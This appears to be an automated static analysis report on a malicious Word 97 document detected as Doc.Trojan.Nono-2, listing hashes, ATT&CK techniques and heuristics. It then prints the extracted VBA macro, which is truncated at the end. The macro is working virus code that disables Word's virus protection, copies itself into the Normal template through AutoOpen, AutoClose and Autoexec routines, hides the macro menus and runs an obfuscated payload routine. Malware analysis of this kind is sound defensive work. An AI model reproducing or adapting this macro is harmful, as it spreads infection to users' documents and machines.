Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7cbe0664a4f40c0f…

MALICIOUS

Office (OLE)

Size: 676.0 KB
Created: 1999-07-05 10:46:00
Authoring application: Microsoft Word 8.0
First seen: 2020-08-10
MD5: 1bca79b5fcad2bdb916936d15bf4070e
SHA-1: 4f5bcbec151186a158448d0e7c585943cac45c62
SHA-256: 7cbe0664a4f40c0f3ca11e6e3d739523493d623ba35f27ec672b5266c8136436
Risk Score: 400

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro attempts to execute code, likely to download and run a second-stage payload. The Shell() call, together with the use of `CreateObject`, indicates an attempt to execute arbitrary code, a common technique for malware droppers.

Heuristics (8)

  • OLE_EQUATION_EDITOR: Equation Editor OLE object (severity: high; CVE related)
    Contains Equation Editor object — related to CVE-2017-11882 / CVE-2018-0802 exploitation, but CLSID presence alone is not the malformed MTEF exploit primitive.
  • CLAMAV_DETECTION: ClamAV: Doc.Trojan.Nono-2 (severity: critical)
    ClamAV detected this file as malware: Doc.Trojan.Nono-2
  • OLE_VBA_MACROS: VBA macros detected (severity: medium; 4 related findings)
    Document contains VBA macro code
  • OLE_VBA_SHELL: Shell() call in VBA (severity: critical)
    Shell() call in VBA
  • OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Obfuscated auto-exec VBA loader (severity: critical)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • OLE_VBA_AUTOOPEN: AutoOpen macro (severity: high)
    AutoOpen macro
  • OLE_VBA_AUTOCLOSE: Auto_Close macro (severity: high)
    Auto_Close macro
  • OLE_LEGACY_WORDBASIC_AUTOEXEC: Legacy WordBasic auto-exec macro marker (severity: medium)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5243 bytes
SHA-256: a3bf087f31d47d64549aac1fc9422578344d8cb60713af916e1304192f4c39f2
Detection: ClamAV: Doc.Trojan.Nono-2
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "OA"
Private Declare Function GetShortPathName Lib "kernel32" Alias "GetShortPathNameA" (ByVal lpszLongPath As String, ByVal lpszShortPath As String, ByVal cchBuffer As Long) As Long
Sub AutoOpen()
On Error Resume Next
cr = vbCr
Options.SaveNormalPrompt = False
Options.VirusProtection = False
Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=Chr(118) + Chr(49), Object:=wdOrganizerObjectProjectItems
Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=Chr(118) + Chr(49) + Chr(49), Object:=wdOrganizerObjectProjectItems
If Minute(Now) = 30 And Second(Now) >= 16 Then Call a
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines > 0 Then
Application.Run MacroName:="Normal.ThisDocument.AutoOpen"
End
End If
Application.OrganizerRename Source:=ActiveDocument.FullName, Name:=ActiveDocument.VBProject.VBComponents.Item(2).Name, NewName:=Application.UserInitials, Object:=wdOrganizerObjectProjectItems
ActiveDocument.VBProject.VBComponents.Item(Application.UserInitials).Export "c:\" + Application.UserInitials
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromString ("Sub AutoOpen()" + cr + _
"On Error Resume Next" + cr + _
"If ActiveDocument.VBProject.VBComponents.Item(2).Name = Application.UserInitials Then" + cr + _
"If Dir(""c:\"" + Application.UserInitials) <> Application.UserInitials Then" + cr + "ActiveDocument.VBProject.VBComponents.Item(x).Export ""c:\"" + Application.UserInitials" + cr + _
"End If" + cr + "Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:=Application.UserInitials, Object:=wdOrganizerObjectProjectItems" + cr + _
"End If" + cr + "Out:" + cr + "End Sub" + cr + "Sub AutoClose()" + cr + "On Error Resume Next" + cr + _
"ActiveDocument.VBProject.VBComponents.Import (""c:\"" + Application.UserInitials)" + cr + "ActiveDocument.SaveAs FileName:=ActiveDocument.FullName" + cr + _
"End Sub" + cr + "Sub ToolsMacro()" + cr + "End Sub" + cr + "Sub ViewVBCode()" + cr + "End Sub" + cr + _
"Sub Autoexec()" + cr + "If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then" + cr + _
"Open ""c:\v1.bas"" For Output As 1" + cr + "Print #1, ""Attribute VB_Name = """"v1""""" + cr + _
"Print #1, ""Sub AutoOpen()""" + cr + "Print #1, ""ActiveDocument.VBProject.VBComponents.Import (""""c:\"""" + Application.UserInitials)""" + cr + _
"Print #1, ""End Sub""" + cr + "Close 1" + cr + "NormalTemplate.VBProject.VBComponents.Import (""c:\v1.bas"")" + cr + "End If" + cr + "End Sub")
NormalTemplate.Save
Call B
End Sub
Function a()
If Day(Now) = 10 Then
an = MsgBox(Chr(82) + Chr(117) + Chr(110) + Chr(32) + Chr(65) + Chr(110) + Chr(105) + Chr(109) + Chr(97) + Chr(116) + Chr(105) + Chr(111) + Chr(110) + Chr(63), vbQuestion + vbYesNo, Chr(72) + Chr(97) + Chr(114) + Chr(100) + Chr(46) + Chr(80) + Chr(111) + Chr(112) + Chr(112) + Chr(121))
If an = vbYes Then Call a
If an = vbNo Then GoTo nono
End If
Set cb = New DataObject
oi = Chr(32)
Application.EnableCancelKey = wdCancelDisabled
S = Chr(86) + Chr(105) + Chr(99) + Chr(111) + Chr(100) + Chr(105) + Chr(110) + Chr(69) + Chr(83) + oi + oi
Application.Caption = oi + oi + S + Chr(47) + Chr(84) + Chr(78) + Chr(78) + oi + Chr(47) + Chr(67) + Chr(66) + oi + oi
For an = 1 To 3
For x = 1 To 15
yy = S + yy
Application.StatusBar = yy
Call Delay
Next x
For t = 1 To 12
yy = S + vbTab + yy
Application.StatusBar = yy
Call Delay
Next t
For u = 1 To 10
yy = vbTab + S + vbTab + yy
Application.StatusBar = yy
Call Delay
Next u
Next an
yy = S + oi + Chr(45) + Chr(45) + Chr(45) + Chr(62) + oi + yy
For i = 1 To 115
yy = oi + yy
Application.StatusBar = yy
For o = 1 To 400000
Next o
Next i
Application.StatusBar = Chr(62) + Chr(58) + Chr(45) + Chr(41) + yy
Application.Caption = Application.Applica
... (truncated)